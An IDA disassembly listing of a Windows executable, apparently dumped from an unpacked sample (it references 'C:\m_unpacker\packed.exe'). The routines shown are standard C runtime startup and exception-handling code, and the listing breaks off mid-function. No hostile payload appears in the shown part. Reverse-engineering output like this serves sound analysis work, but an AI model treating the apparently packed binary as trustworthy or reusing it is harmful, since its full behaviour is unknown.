sub_40B27C	proc near		; CODE XREF: sub_40B414+55p
					; sub_40B414+96p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	ecx, [ebp+arg_8]
		push	ebx
		xor	eax, eax
		cmp	[ebp+arg_0], eax
		push	esi
		mov	[edi], eax
		mov	esi, edx
		mov	edx, [ebp+arg_4]
		mov	dword ptr [ecx], 1
		jz	short loc_40B2A2
		mov	ebx, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[ebx], edx

loc_40B2A2:				; CODE XREF: sub_40B27C+1Bj
		mov	[ebp+var_4], eax

loc_40B2A5:				; CODE XREF: sub_40B27C+7Ej
					; sub_40B27C+88j
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B2BA
		xor	eax, eax
		cmp	[ebp+var_4], eax
		mov	bl, 22h
		setz	al
		inc	esi
		mov	[ebp+var_4], eax
		jmp	short loc_40B2F6
; ---------------------------------------------------------------------------

loc_40B2BA:				; CODE XREF: sub_40B27C+2Cj
		inc	dword ptr [edi]
		test	edx, edx
		jz	short loc_40B2C8
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B2C8:				; CODE XREF: sub_40B27C+42j
		mov	bl, [esi]
		movzx	eax, bl
		push	eax
		inc	esi
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B2EC
		inc	dword ptr [edi]
		cmp	[ebp+arg_4], 0
		jz	short loc_40B2EB
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al

loc_40B2EB:				; CODE XREF: sub_40B27C+63j
		inc	esi

loc_40B2EC:				; CODE XREF: sub_40B27C+5Bj
		test	bl, bl
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		jz	short loc_40B328

loc_40B2F6:				; CODE XREF: sub_40B27C+3Cj
		cmp	[ebp+var_4], 0
		jnz	short loc_40B2A5
		cmp	bl, 20h
		jz	short loc_40B306
		cmp	bl, 9
		jnz	short loc_40B2A5

loc_40B306:				; CODE XREF: sub_40B27C+83j
		test	edx, edx
		jz	short loc_40B30E
		mov	byte ptr [edx-1], 0

loc_40B30E:				; CODE XREF: sub_40B27C+8Cj
					; sub_40B27C+ADj
		and	[ebp+var_4], 0

loc_40B312:				; CODE XREF: sub_40B27C+183j
		cmp	byte ptr [esi],	0
		jz	loc_40B404

loc_40B31B:				; CODE XREF: sub_40B27C+AAj
		mov	al, [esi]
		cmp	al, 20h
		jz	short loc_40B325
		cmp	al, 9
		jnz	short loc_40B32B

loc_40B325:				; CODE XREF: sub_40B27C+A3j
		inc	esi
		jmp	short loc_40B31B
; ---------------------------------------------------------------------------

loc_40B328:				; CODE XREF: sub_40B27C+78j
		dec	esi
		jmp	short loc_40B30E
; ---------------------------------------------------------------------------

loc_40B32B:				; CODE XREF: sub_40B27C+A7j
		cmp	byte ptr [esi],	0
		jz	loc_40B404
		cmp	[ebp+arg_0], 0
		jz	short loc_40B343
		mov	eax, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[eax], edx

loc_40B343:				; CODE XREF: sub_40B27C+BCj
		inc	dword ptr [ecx]

loc_40B345:				; CODE XREF: sub_40B27C+16Ej
		xor	ebx, ebx
		inc	ebx
		xor	ecx, ecx
		jmp	short loc_40B34E
; ---------------------------------------------------------------------------

loc_40B34C:				; CODE XREF: sub_40B27C+D5j
		inc	esi
		inc	ecx

loc_40B34E:				; CODE XREF: sub_40B27C+CEj
		cmp	byte ptr [esi],	5Ch
		jz	short loc_40B34C
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B37E
		test	cl, 1
		jnz	short loc_40B37C
		cmp	[ebp+var_4], 0
		jz	short loc_40B36F
		lea	eax, [esi+1]
		cmp	byte ptr [eax],	22h
		jnz	short loc_40B36F
		mov	esi, eax
		jmp	short loc_40B37C
; ---------------------------------------------------------------------------

loc_40B36F:				; CODE XREF: sub_40B27C+E5j
					; sub_40B27C+EDj
		xor	eax, eax
		xor	ebx, ebx
		cmp	[ebp+var_4], eax
		setz	al
		mov	[ebp+var_4], eax

loc_40B37C:				; CODE XREF: sub_40B27C+DFj
					; sub_40B27C+F1j
		shr	ecx, 1

loc_40B37E:				; CODE XREF: sub_40B27C+DAj
		test	ecx, ecx
		jz	short loc_40B394

loc_40B382:				; CODE XREF: sub_40B27C+113j
		dec	ecx
		test	edx, edx
		jz	short loc_40B38B
		mov	byte ptr [edx],	5Ch
		inc	edx

loc_40B38B:				; CODE XREF: sub_40B27C+109j
		inc	dword ptr [edi]
		test	ecx, ecx
		jnz	short loc_40B382
		mov	[ebp+arg_4], edx

loc_40B394:				; CODE XREF: sub_40B27C+104j
		mov	al, [esi]
		test	al, al
		jz	short loc_40B3EF
		cmp	[ebp+var_4], 0
		jnz	short loc_40B3A8
		cmp	al, 20h
		jz	short loc_40B3EF
		cmp	al, 9
		jz	short loc_40B3EF

loc_40B3A8:				; CODE XREF: sub_40B27C+122j
		test	ebx, ebx
		jz	short loc_40B3E9
		test	edx, edx
		movsx	eax, al
		push	eax
		jz	short loc_40B3D7
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B3CB
		mov	al, [esi]
		mov	ecx, [ebp+arg_4]
		inc	[ebp+arg_4]
		mov	[ecx], al
		inc	esi
		inc	dword ptr [edi]

loc_40B3CB:				; CODE XREF: sub_40B27C+140j
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al
		jmp	short loc_40B3E4
; ---------------------------------------------------------------------------

loc_40B3D7:				; CODE XREF: sub_40B27C+136j
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B3E4
		inc	esi
		inc	dword ptr [edi]

loc_40B3E4:				; CODE XREF: sub_40B27C+159j
					; sub_40B27C+163j
		inc	dword ptr [edi]
		mov	edx, [ebp+arg_4]

loc_40B3E9:				; CODE XREF: sub_40B27C+12Ej
		inc	esi
		jmp	loc_40B345
; ---------------------------------------------------------------------------

loc_40B3EF:				; CODE XREF: sub_40B27C+11Cj
					; sub_40B27C+126j ...
		test	edx, edx
		jz	short loc_40B3FA
		mov	byte ptr [edx],	0
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B3FA:				; CODE XREF: sub_40B27C+175j
		inc	dword ptr [edi]
		mov	ecx, [ebp+arg_8]
		jmp	loc_40B312
; ---------------------------------------------------------------------------

loc_40B404:				; CODE XREF: sub_40B27C+99j
					; sub_40B27C+B2j
		mov	eax, [ebp+arg_0]
		test	eax, eax
		pop	esi
		pop	ebx
		jz	short loc_40B410
		and	dword ptr [eax], 0

loc_40B410:				; CODE XREF: sub_40B27C+18Fj
		inc	dword ptr [ecx]
		leave
		retn
sub_40B27C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B414	proc near		; CODE XREF: .text:00404624p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		xor	ebx, ebx
		cmp	dword_438FF4, ebx
		push	esi
		push	edi
		jnz	short loc_40B42C
		call	sub_4053C3

loc_40B42C:				; CODE XREF: sub_40B414+11j
		push	104h
		mov	esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
		push	esi
		push	ebx
		mov	byte_428F1C, bl
		call	ds:dword_41E060	; GetModuleFileNameA
		mov	eax, dword_439018
		cmp	eax, ebx
		mov	off_428AC8, esi
		jz	short loc_40B45A
		cmp	[eax], bl
		mov	[ebp+var_4], eax
		jnz	short loc_40B45D

loc_40B45A:				; CODE XREF: sub_40B414+3Dj
		mov	[ebp+var_4], esi

loc_40B45D:				; CODE XREF: sub_40B414+44j
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		push	ebx
		push	ebx
		lea	edi, [ebp+var_C]
		call	sub_40B27C
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		cmp	eax, 3FFFFFFFh
		jnb	short loc_40B4C5
		mov	ecx, [ebp+var_C]
		cmp	ecx, 0FFFFFFFFh
		jnb	short loc_40B4C5
		mov	edi, eax
		shl	edi, 2
		lea	eax, [edi+ecx]
		cmp	eax, ecx
		jb	short loc_40B4C5
		push	eax
		call	sub_407CFA
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		jz	short loc_40B4C5
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		add	edi, esi
		push	edi
		push	esi
		lea	edi, [ebp+var_C]
		call	sub_40B27C
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		dec	eax
		mov	dword_428AAC, eax
		mov	dword_428AB0, esi
		xor	eax, eax
		jmp	short loc_40B4C8
; ---------------------------------------------------------------------------

loc_40B4C5:				; CODE XREF: sub_40B414+65j
					; sub_40B414+6Dj ...
		or	eax, 0FFFFFFFFh

loc_40B4C8:				; CODE XREF: sub_40B414+AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40B414	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B4CD	proc near		; CODE XREF: .text:0040461Ap

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ecx
		push	ecx
		mov	eax, dword_428F20
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, ds:dword_41E130
		xor	ebx, ebx
		xor	esi, esi
		cmp	eax, ebx
		push	2
		pop	ebp
		jnz	short loc_40B516
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jz	short loc_40B4FD
		mov	dword_428F20, 1
		jmp	short loc_40B51F
; ---------------------------------------------------------------------------

loc_40B4FD:				; CODE XREF: sub_40B4CD+22j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40B511
		mov	eax, ebp
		mov	dword_428F20, eax
		jmp	short loc_40B516
; ---------------------------------------------------------------------------

loc_40B511:				; CODE XREF: sub_40B4CD+39j
		mov	eax, dword_428F20

loc_40B516:				; CODE XREF: sub_40B4CD+1Aj
					; sub_40B4CD+42j
		cmp	eax, 1
		jnz	loc_40B5A3

loc_40B51F:				; CODE XREF: sub_40B4CD+2Ej
		cmp	esi, ebx
		jnz	short loc_40B532
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jnz	short loc_40B532

loc_40B52B:				; CODE XREF: sub_40B4CD+DCj
					; sub_40B4CD+E8j ...
		xor	eax, eax
		jmp	loc_40B5FB
; ---------------------------------------------------------------------------

loc_40B532:				; CODE XREF: sub_40B4CD+54j
					; sub_40B4CD+5Cj
		cmp	[esi], bx
		mov	eax, esi
		jz	short loc_40B547

loc_40B539:				; CODE XREF: sub_40B4CD+71j
					; sub_40B4CD+78j
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B539
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B539

loc_40B547:				; CODE XREF: sub_40B4CD+6Aj
		mov	edi, ds:dword_41E134
		push	ebx
		push	ebx
		push	ebx
		sub	eax, esi
		push	ebx
		sar	eax, 1
		inc	eax
		push	eax
		push	esi
		push	ebx
		push	ebx
		mov	[esp+38h+var_4], eax
		call	edi	; WideCharToMultiByte
		mov	ebp, eax
		cmp	ebp, ebx
		jz	short loc_40B598
		push	ebp
		call	sub_407CFA
		cmp	eax, ebx
		pop	ecx
		mov	[esp+18h+var_8], eax
		jz	short loc_40B598
		push	ebx
		push	ebx
		push	ebp
		push	eax
		push	[esp+28h+var_4]
		push	esi
		push	ebx
		push	ebx
		call	edi	; WideCharToMultiByte
		test	eax, eax
		jnz	short loc_40B594
		push	[esp+18h+var_8]
		call	sub_403B91
		pop	ecx
		mov	[esp+18h+var_8], ebx

loc_40B594:				; CODE XREF: sub_40B4CD+B7j
		mov	ebx, [esp+18h+var_8]

loc_40B598:				; CODE XREF: sub_40B4CD+97j
					; sub_40B4CD+A6j
		push	esi
		call	ds:dword_41E138	; FreeEnvironmentStringsW
		mov	eax, ebx
		jmp	short loc_40B5FB
; ---------------------------------------------------------------------------

loc_40B5A3:				; CODE XREF: sub_40B4CD+4Cj
		cmp	eax, ebp
		jz	short loc_40B5AB
		cmp	eax, ebx
		jnz	short loc_40B52B

loc_40B5AB:				; CODE XREF: sub_40B4CD+D8j
		call	ds:off_41E13C
		mov	esi, eax
		cmp	esi, ebx
		jz	loc_40B52B
		cmp	[esi], bl
		jz	short loc_40B5C9

loc_40B5BF:				; CODE XREF: sub_40B4CD+F5j
					; sub_40B4CD+FAj
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B5BF
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B5BF

loc_40B5C9:				; CODE XREF: sub_40B4CD+F0j
		sub	eax, esi
		inc	eax
		mov	ebp, eax
		push	ebp
		call	sub_407CFA
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		jnz	short loc_40B5E7
		push	esi
		call	ds:off_41E140
		jmp	loc_40B52B
; ---------------------------------------------------------------------------

loc_40B5E7:				; CODE XREF: sub_40B4CD+10Cj
		push	ebp
		push	esi
		push	edi
		call	sub_4081B0
		add	esp, 0Ch
		push	esi
		call	ds:off_41E140
		mov	eax, edi

loc_40B5FB:				; CODE XREF: sub_40B4CD+60j
					; sub_40B4CD+D4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		pop	ecx
		retn
sub_40B4CD	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B602	proc near		; CODE XREF: .text:loc_4045F6p
		push	esi
		push	edi
		mov	eax, offset dword_4227E0
		mov	edi, offset dword_4227E0
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B623

loc_40B614:				; CODE XREF: sub_40B602+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B61C
		call	eax

loc_40B61C:				; CODE XREF: sub_40B602+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B614

loc_40B623:				; CODE XREF: sub_40B602+10j
		pop	edi
		pop	esi
		retn
sub_40B602	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B626	proc near		; DATA XREF: sub_407F39+3Fo
		push	esi
		push	edi
		mov	eax, offset dword_4227E8
		mov	edi, offset dword_4227E8
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B647

loc_40B638:				; CODE XREF: sub_40B626+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B640
		call	eax

loc_40B640:				; CODE XREF: sub_40B626+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B638

loc_40B647:				; CODE XREF: sub_40B626+10j
		pop	edi
		pop	esi
		retn
sub_40B626	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B64A	proc near		; CODE XREF: .text:loc_4046E2p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		push	ebx
		push	edi
		mov	edi, 0BB40E64Eh
		cmp	eax, edi
		mov	ebx, 0FFFF0000h
		jz	short loc_40B67A
		test	eax, ebx
		jz	short loc_40B67A
		not	eax
		mov	dword_424068, eax
		jmp	short loc_40B6DA
; ---------------------------------------------------------------------------

loc_40B67A:				; CODE XREF: sub_40B64A+21j
					; sub_40B64A+25j
		push	esi
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E1A0
		mov	esi, [ebp+var_4]
		xor	esi, [ebp+var_8]
		call	ds:dword_41E194	; GetCurrentProcessId
		xor	esi, eax
		call	ds:dword_41E0DC	; GetCurrentThreadId
		xor	esi, eax
		call	ds:dword_41E104	; GetTickCount
		xor	esi, eax
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41E058	; QueryPerformanceCounter
		mov	eax, [ebp+var_C]
		xor	eax, [ebp+var_10]
		xor	esi, eax
		cmp	esi, edi
		jnz	short loc_40B6C0
		mov	esi, 0BB40E64Fh
		jmp	short loc_40B6CB
; ---------------------------------------------------------------------------

loc_40B6C0:				; CODE XREF: sub_40B64A+6Dj
		test	esi, ebx
		jnz	short loc_40B6CB
		mov	eax, esi
		shl	eax, 10h
		or	esi, eax

loc_40B6CB:				; CODE XREF: sub_40B64A+74j
					; sub_40B64A+78j
		mov	dword_424064, esi
		not	esi
		mov	dword_424068, esi
		pop	esi

loc_40B6DA:				; CODE XREF: sub_40B64A+2Ej
		pop	edi
		pop	ebx
		leave
		retn
sub_40B64A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B6DE	proc near		; DATA XREF: sub_40B74Ao
					; .data:00424060o ...

arg_0		= dword	ptr  4

		push	edi
		mov	edi, [esp+4+arg_0]
		mov	eax, [edi]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B717
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B717
		mov	eax, [eax+14h]
		cmp	eax, 19930520h
		jz	short loc_40B712
		cmp	eax, 19930521h
		jz	short loc_40B712
		cmp	eax, 19930522h
		jz	short loc_40B712
		cmp	eax, 1994000h
		jnz	short loc_40B717

loc_40B712:				; CODE XREF: sub_40B6DE+1Dj
					; sub_40B6DE+24j ...
		call	sub_40C419

loc_40B717:				; CODE XREF: sub_40B6DE+Dj
					; sub_40B6DE+13j ...
		cmp	byte_428F28, 0
		push	esi
		jz	short loc_40B743
		push	dword_428F24
		call	sub_405753
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	short loc_40B743
		push	esi
		call	sub_410770
		test	eax, eax
		pop	ecx
		jz	short loc_40B743
		push	edi
		call	esi
		jmp	short loc_40B745
; ---------------------------------------------------------------------------

loc_40B743:				; CODE XREF: sub_40B6DE+41j
					; sub_40B6DE+53j ...
		xor	eax, eax

loc_40B745:				; CODE XREF: sub_40B6DE+63j
		pop	esi
		pop	edi
		retn	4
sub_40B6DE	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B74A	proc near		; DATA XREF: zcrshv4o:0041E2F4o
		push	offset sub_40B6DE
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		push	eax
		call	sub_4056E7
		mov	dword_428F24, eax
		pop	ecx
		mov	byte_428F28, 1
		xor	eax, eax
		retn
sub_40B74A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B76B	proc near		; DATA XREF: zcrshv4o:0041E310o
		cmp	byte_428F28, 0
		jz	short locret_40B78E
		push	dword_428F24
		call	sub_405753
		pop	ecx
		push	eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		mov	byte_428F28, 0

locret_40B78E:				; CODE XREF: sub_40B76B+7j
		retn
sub_40B76B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B78F	proc near		; DATA XREF: zcrshv4o:00422C38o
		mov	dword ptr [ecx], offset	off_41EC44
		jmp	sub_403258
sub_40B78F	endp

; ---------------------------------------------------------------------------

loc_40B79A:				; DATA XREF: zcrshv4o:off_41EC44o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41EC44
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_40B7B6
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40B7B6:				; CODE XREF: .text:0040B7ADj
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_40B7BC	proc near		; CODE XREF: sub_40B9FB+4Ep
					; sub_40BFC7+21Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		mov	eax, [edi+4]
		test	eax, eax
		jz	short loc_40B812
		lea	edx, [eax+8]
		cmp	byte ptr [edx],	0
		jz	short loc_40B812
		mov	esi, [esp+8+arg_4]
		mov	ecx, [esi+4]
		cmp	eax, ecx
		jz	short loc_40B7F0
		add	ecx, 8
		push	ecx
		push	edx
		call	sub_408590
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40B7F0

loc_40B7EC:				; CODE XREF: sub_40B7BC+3Cj
					; sub_40B7BC+4Bj ...
		xor	eax, eax
		jmp	short loc_40B815
; ---------------------------------------------------------------------------

loc_40B7F0:				; CODE XREF: sub_40B7BC+1Ej
					; sub_40B7BC+2Ej
		test	byte ptr [esi],	2
		jz	short loc_40B7FA
		test	byte ptr [edi],	8
		jz	short loc_40B7EC

loc_40B7FA:				; CODE XREF: sub_40B7BC+37j
		mov	eax, [esp+8+arg_8]
		mov	eax, [eax]
		test	al, 1
		jz	short loc_40B809
		test	byte ptr [edi],	1
		jz	short loc_40B7EC

loc_40B809:				; CODE XREF: sub_40B7BC+46j
		test	al, 2
		jz	short loc_40B812
		test	byte ptr [edi],	2
		jz	short loc_40B7EC

loc_40B812:				; CODE XREF: sub_40B7BC+Bj
					; sub_40B7BC+13j ...
		xor	eax, eax
		inc	eax

loc_40B815:				; CODE XREF: sub_40B7BC+32j
		pop	edi
		pop	esi
		retn
sub_40B7BC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B818	proc near		; CODE XREF: sub_40B85C+85p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0E0434F4Dh
		jz	short loc_40B83F
		cmp	eax, 0E06D7363h
		jnz	short loc_40B859
		call	sub_40595D
		and	dword ptr [eax+90h], 0
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40B83F:				; CODE XREF: sub_40B818+Dj
		call	sub_40595D
		cmp	dword ptr [eax+90h], 0
		jle	short loc_40B859
		call	sub_40595D
		add	eax, 90h
		dec	dword ptr [eax]

loc_40B859:				; CODE XREF: sub_40B818+14j
					; sub_40B818+33j
		xor	eax, eax
		retn
sub_40B818	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B85C	proc near		; CODE XREF: sub_40BABD+ECp
					; sub_40BE69+36p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	10h
		push	offset dword_422B30
		call	__SEH_prolog4
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		cmp	dword ptr [edi+4], 80h
		jg	short loc_40B87D
		movsx	esi, byte ptr [ebx+8]
		jmp	short loc_40B880
; ---------------------------------------------------------------------------

loc_40B87D:				; CODE XREF: sub_40B85C+19j
		mov	esi, [ebx+8]

loc_40B880:				; CODE XREF: sub_40B85C+1Fj
		mov	[ebp+var_1C], esi
		call	sub_40595D
		add	eax, 90h
		inc	dword ptr [eax]
		and	[ebp+ms_exc.disabled], 0

loc_40B893:				; CODE XREF: sub_40B85C+9Fj
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B8FD
		cmp	esi, 0FFFFFFFFh
		jle	short loc_40B8A2
		cmp	esi, [edi+4]
		jl	short loc_40B8A7

loc_40B8A2:				; CODE XREF: sub_40B85C+3Fj
		call	sub_40C465

loc_40B8A7:				; CODE XREF: sub_40B85C+44j
		mov	eax, esi
		shl	eax, 3
		mov	ecx, [edi+8]
		add	ecx, eax
		mov	esi, [ecx]
		mov	[ebp+var_20], esi
		mov	[ebp+ms_exc.disabled], 1
		cmp	dword ptr [ecx+4], 0
		jz	short loc_40B8D8
		mov	[ebx+8], esi
		push	103h
		push	ebx
		mov	ecx, [edi+8]
		push	dword ptr [ecx+eax+4]
		call	sub_40C4B0

loc_40B8D8:				; CODE XREF: sub_40B85C+65j
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40B8F8
; ---------------------------------------------------------------------------

loc_40B8DE:				; DATA XREF: zcrshv4o:00422B50o
		push	[ebp+ms_exc.exc_ptr]
		call	sub_40B818
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40B8E8:				; DATA XREF: zcrshv4o:00422B54o
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		mov	esi, [ebp+var_20]

loc_40B8F8:				; CODE XREF: sub_40B85C+80j
		mov	[ebp+var_1C], esi
		jmp	short loc_40B893
; ---------------------------------------------------------------------------

loc_40B8FD:				; CODE XREF: sub_40B85C+3Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40B922
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B913
		call	sub_40C465

loc_40B913:				; CODE XREF: sub_40B85C+B0j
		mov	[ebx+8], esi
		call	__SEH_epilog4
		retn
sub_40B85C	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B91C	proc near		; DATA XREF: zcrshv4o:00422B48o
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_40B91C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40B922	proc near		; CODE XREF: sub_40B85C+A8p
		call	sub_40595D
		cmp	dword ptr [eax+90h], 0
		jle	short locret_40B93C
		call	sub_40595D
		add	eax, 90h
		dec	dword ptr [eax]

locret_40B93C:				; CODE XREF: sub_40B922+Cj
		retn
sub_40B922	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B93D	proc near		; CODE XREF: sub_40BABD+93p
		mov	eax, [eax]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B97F
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B97F
		mov	ecx, [eax+14h]
		cmp	ecx, 19930520h
		jz	short loc_40B968
		cmp	ecx, 19930521h
		jz	short loc_40B968
		cmp	ecx, 19930522h
		jnz	short loc_40B97F

loc_40B968:				; CODE XREF: sub_40B93D+19j
					; sub_40B93D+21j
		cmp	dword ptr [eax+1Ch], 0
		jnz	short loc_40B97F
		call	sub_40595D
		xor	ecx, ecx
		inc	ecx
		mov	[eax+20Ch], ecx
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40B97F:				; CODE XREF: sub_40B93D+8j
					; sub_40B93D+Ej ...
		xor	eax, eax
		retn
sub_40B93D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B982	proc near		; CODE XREF: sub_406C00+112p
					; sub_40BBE3+6Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422B58
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short loc_40B9BF
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_40B9BF
		mov	eax, [ecx+1Ch]
		test	eax, eax
		jz	short loc_40B9BF
		mov	eax, [eax+4]
		test	eax, eax
		jz	short loc_40B9BF
		and	[ebp+ms_exc.disabled], 0
		push	eax
		push	dword ptr [ecx+18h]
		call	sub_4047F5
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40B9BF:				; CODE XREF: sub_40B982+11j
					; sub_40B982+19j ...
		call	__SEH_epilog4
		retn
sub_40B982	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		cmp	[ebp+0Ch], al
		setnz	al
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C419

; =============== S U B	R O U T	I N E =======================================



sub_40B9D6	proc near		; CODE XREF: sub_40BC59+86p
					; sub_40BC59+113p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		mov	eax, [ecx]
		push	esi
		mov	esi, [esp+4+arg_0]
		add	eax, esi
		cmp	dword ptr [ecx+4], 0
		jl	short loc_40B9F9
		mov	edx, [ecx+4]
		mov	ecx, [ecx+8]
		mov	esi, [edx+esi]
		mov	ecx, [esi+ecx]
		add	ecx, edx
		add	eax, ecx

loc_40B9F9:				; CODE XREF: sub_40B9D6+11j
		pop	esi
		retn
sub_40B9D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B9FB	proc near		; CODE XREF: sub_40BFC7+111p
					; sub_40BFC7+2AEp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		test	edi, edi
		jnz	short loc_40BA0F
		call	sub_40C465
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40BA0F:				; CODE XREF: sub_40B9FB+8j
		and	[ebp+var_8], 0
		cmp	dword ptr [edi], 0
		mov	[ebp+var_1], 0
		jle	short loc_40BA6F
		push	ebx
		push	esi

loc_40BA1E:				; CODE XREF: sub_40B9FB+70j
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+1Ch]
		mov	eax, [eax+0Ch]
		mov	ebx, [eax]
		test	ebx, ebx
		lea	esi, [eax+4]
		jle	short loc_40BA63
		mov	eax, [ebp+var_8]
		shl	eax, 4
		mov	[ebp+var_C], eax

loc_40BA39:				; CODE XREF: sub_40B9FB+60j
		mov	ecx, [ebp+arg_0]
		push	dword ptr [ecx+1Ch]
		mov	eax, [esi]
		push	eax
		mov	eax, [edi+4]
		add	eax, [ebp+var_C]
		push	eax
		call	sub_40B7BC
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40BA5F
		dec	ebx
		add	esi, 4
		test	ebx, ebx
		jg	short loc_40BA39
		jmp	short loc_40BA63
; ---------------------------------------------------------------------------

loc_40BA5F:				; CODE XREF: sub_40B9FB+58j
		mov	[ebp+var_1], 1

loc_40BA63:				; CODE XREF: sub_40B9FB+33j
					; sub_40B9FB+62j
